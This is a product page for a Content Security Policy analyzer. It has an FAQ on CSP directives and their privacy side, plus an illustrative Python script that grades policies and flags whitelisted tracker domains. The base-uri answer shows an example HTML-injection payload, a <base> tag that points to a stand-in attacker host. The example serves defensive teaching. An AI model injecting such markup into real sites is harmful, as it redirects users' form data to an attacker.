
CSP Analyzer

Deep Content Security Policy analysis — decodes all directives, detects unsafe-inline/unsafe-eval, identifies tracker origins whitelisted in script-src, and grades CSP strength A-F with a privacy angle.

How to Use CSP Analyzer

  1. Enter the URL of the website you want to analyze.
  2. See every CSP directive decoded with per-directive security analysis.
  3. Review tracker origins whitelisted in your script-src (privacy angle).
  4. Use the recommendations to strengthen your policy.

Frequently Asked Questions

What is Content Security Policy (CSP)?
Content Security Policy is an HTTP response header that tells browsers which sources are allowed to load scripts, styles, images, and other resources on your page. It's the primary defense against Cross-Site Scripting (XSS) attacks — a properly configured CSP prevents injected scripts from executing even if an attacker finds an XSS vulnerability.
Why is 'unsafe-inline' in script-src a problem?
'unsafe-inline' allows inline JavaScript (scripts in <script> tags, onclick attributes, javascript: URLs). This is the most common XSS vector — it means any injected inline script can execute. Using nonces (cryptographic one-time tokens generated per request) or hashes (SHA-256 of allowed scripts) lets you allow specific inline scripts without enabling all inline scripts.
What is the privacy angle of CSP?
Your script-src and connect-src directives are essentially a permission list of who can run code and receive data from your page. If you've whitelisted Google Analytics, Facebook, TikTok, and LinkedIn in your CSP, you're explicitly authorizing those companies to execute code on your pages and potentially exfiltrate user data. This is a GDPR data processor authorization list hidden in your HTTP headers.
What does object-src 'none' protect against?
object-src controls the <object>, <embed>, and <applet> elements — historically used to load Flash, Java, and other plugins. Setting object-src 'none' prevents any plugin content from loading, eliminating an entire class of attacks and potential third-party data exfiltration via plugin content. This should always be set to 'none' on modern sites; note that object-src falls back to default-src when it is omitted, so a permissive default-src silently allows plugin content.
What is the difference between CSP and CSP-Report-Only?
Content-Security-Policy enforces the policy — browsers block violations. Content-Security-Policy-Report-Only only logs violations to a report endpoint without blocking anything. Report-Only is useful for testing a new CSP before enforcing it, but provides zero actual protection. A common mistake is accidentally deploying Report-Only instead of the enforced header.
How does this CSP analyzer differ from other tools?
Most CSP tools only check for unsafe-inline and missing directives. This analyzer additionally cross-references your script-src and connect-src against a database of 35+ known tracker and advertising domains, showing you exactly which data brokers and ad networks have explicit CSP permission to run on your site — a unique privacy-focused angle.
What is the base-uri directive and why does it matter?
base-uri controls which URLs can be used in the <base> HTML element. If a site is vulnerable to HTML injection (but not script injection), an attacker can inject <base href="https://attacker.com/"> to redirect all relative URLs — like form action targets — to their server. Setting base-uri 'none' or base-uri 'self' eliminates this attack vector. Unlike the fetch directives, base-uri does not inherit from default-src, so it must be set explicitly.
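As an added example, and not the Zenovay tool's own code, the following Python script performs the core checks the FAQ describes: it parses a Content-Security-Policy value into directives (first occurrence wins, as browsers do), applies the default-src fallback for script-src, connect-src and object-src but not for base-uri, flags 'unsafe-inline' and 'unsafe-eval' (noting that 'unsafe-inline' is ignored by nonce/hash-aware browsers when a nonce or hash is present), checks object-src and base-uri, cross-references script-src and connect-src against a small constructed tracker list standing in for the tool's 35+ domain database, and produces an A-F grade. The tracker hosts, penalty weights and grade thresholds are assumptions made for this example.

```python
"""Minimal CSP analyzer (added example, not the Zenovay tool's code)."""
import re
from dataclasses import dataclass

# Constructed illustrative tracker list; a stand-in for the tool's real database.
TRACKER_HOSTS = {
    "www.google-analytics.com",
    "www.googletagmanager.com",
    "connect.facebook.net",
    "analytics.tiktok.com",
    "snap.licdn.com",
}

# Fetch directives that inherit from default-src when absent. base-uri does not.
FALLS_BACK_TO_DEFAULT = {"script-src", "connect-src", "object-src"}

# Assumed penalty weights per finding severity (not the tool's scoring).
PENALTY = {"critical": 40, "high": 20, "medium": 10, "low": 5}


@dataclass
class Finding:
    severity: str
    directive: str
    message: str


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP value into {directive: [sources]}; a repeated directive is ignored."""
    policy: dict[str, list[str]] = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective(policy: dict[str, list[str]], directive: str):
    """Sources that actually apply to a directive, honouring the default-src fallback."""
    if directive in policy:
        return policy[directive]
    if directive in FALLS_BACK_TO_DEFAULT:
        return policy.get("default-src")
    return None


def host_of(source: str):
    """Host of a host-source expression; None for keywords, nonces, hashes, bare schemes."""
    if source.startswith("'") or source.endswith(":"):
        return None
    host = re.sub(r"^[a-z][a-z0-9+.-]*://", "", source, flags=re.I)  # drop scheme
    host = host.split("/", 1)[0]                                        # drop path
    host = re.sub(r":(\d+|\*)$", "", host)                               # drop port
    return host.lower()


def tracker_matches(source: str) -> set[str]:
    """Tracker hosts that one source expression whitelists (wildcards expand)."""
    host = host_of(source)
    if host is None:
        return set()
    if host.startswith("*."):
        return {t for t in TRACKER_HOSTS if t.endswith(host[1:])}
    return {host} & TRACKER_HOSTS


def analyze(header: str) -> dict:
    """Return score, A-F grade, findings and whitelisted tracker origins for a policy."""
    policy = parse_csp(header)
    findings: list[Finding] = []
    trackers: dict[str, set[str]] = {}

    scripts = effective(policy, "script-src")
    if scripts is None:
        findings.append(Finding("critical", "script-src",
                                "neither script-src nor default-src is set; scripts are unrestricted"))
    else:
        has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
                                for s in scripts)
        if "'unsafe-inline'" in scripts:
            if has_nonce_or_hash:  # CSP3 browsers ignore 'unsafe-inline' once a nonce/hash is present
                findings.append(Finding("low", "script-src",
                                        "'unsafe-inline' is ignored by nonce/hash-aware browsers"))
            else:
                findings.append(Finding("critical", "script-src",
                                        "'unsafe-inline' lets any injected inline script run"))
        if "'unsafe-eval'" in scripts:
            findings.append(Finding("high", "script-src", "'unsafe-eval' permits eval()-style execution"))
        if any(s in ("*", "http:", "https:") for s in scripts):
            findings.append(Finding("high", "script-src", "wildcard/scheme-only source allows any origin"))

    if effective(policy, "object-src") != ["'none'"]:
        findings.append(Finding("medium", "object-src", "object-src should be 'none'"))
    if "base-uri" not in policy:
        findings.append(Finding("medium", "base-uri", "base-uri missing; it does not inherit default-src"))

    for directive in ("script-src", "connect-src"):
        hits: set[str] = set()
        for source in effective(policy, directive) or []:
            hits |= tracker_matches(source)
        if hits:
            trackers[directive] = hits
            findings.append(Finding("low", directive, "tracker origins: " + ", ".join(sorted(hits))))

    score = max(0, 100 - sum(PENALTY[f.severity] for f in findings))
    grade = next(g for g, floor in (("A", 90), ("B", 75), ("C", 60), ("D", 45), ("F", 0)) if score >= floor)
    return {"score": score, "grade": grade, "findings": findings, "trackers": trackers}


if __name__ == "__main__":
    # Constructed sample policy for demonstration.
    sample = ("default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' "
              "https://www.google-analytics.com *.facebook.net; connect-src 'self' https://analytics.tiktok.com")
    report = analyze(sample)
    print(f"grade {report['grade']} (score {report['score']})")
    for f in report["findings"]:
        print(f"[{f.severity}] {f.directive}: {f.message}")
```

Running the script on the constructed sample policy reports grade F: 'unsafe-inline' without a nonce or hash, 'unsafe-eval', object-src inheriting 'self' from default-src, a missing base-uri, and tracker origins in both script-src and connect-src. A policy such as `default-src 'none'; script-src 'self' 'nonce-...'; object-src 'none'; base-uri 'none'` produces no findings and grades A.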